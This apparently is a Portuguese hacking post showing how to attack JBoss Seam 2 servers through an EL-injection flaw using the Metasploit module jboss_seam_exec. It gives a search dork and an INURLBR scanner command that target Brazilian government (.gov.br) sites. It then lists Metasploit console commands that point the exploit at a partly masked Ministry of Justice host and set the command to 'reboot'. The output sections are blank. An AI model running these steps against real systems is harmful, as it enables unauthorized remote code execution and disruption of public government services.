JBoss Seam 2 Remote Command Execution - Metasploit
JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. This modules also has been tested successfully against IBM WebSphere 6.1 running on iSeries. NOTE: this is only a vulnerability when the Java Security Manager is not properly configured.
- MODULE METASPLOIT:auxiliary/admin/http/jboss_seam_exec
- COMMAND SCANNER INURLBR:/inurlbr.php --dork 'site:.gov.br inurl:.seam' -s jboss.txt -q 1,6
- DORK:site:.gov.br inurl:.seam intitle:"JBoss Seam Debug"
Configuração:
- CMD - The command to execute.
- RHOST - The target address
- RPORT - The target port
- TARGETURI - Target URI
msf > use auxiliary/admin/http/jboss_seam_exec
msf auxiliary(jboss_seam_exec) > set RHOST *******.mj.gov.br
msf auxiliary(jboss_seam_exec) > set RPORT 80
msf auxiliary(jboss_seam_exec) > set CMD reboot
msf auxiliary(jboss_seam_exec) > set TARGETURI /******/home.seam
msf auxiliary(jboss_seam_exec) > exploit
Output:
Output:
Resultado:
VÍDEO:
REFERENCE: http://www.rapid7.com/db/modules/auxiliary/admin/http/jboss_seam_exec
SCANNER INURLBR: http://github.com/googleinurl/SCANNER-INURLBR
REFERENCE: http://www.rapid7.com/db/modules/auxiliary/admin/http/jboss_seam_exec
SCANNER INURLBR: http://github.com/googleinurl/SCANNER-INURLBR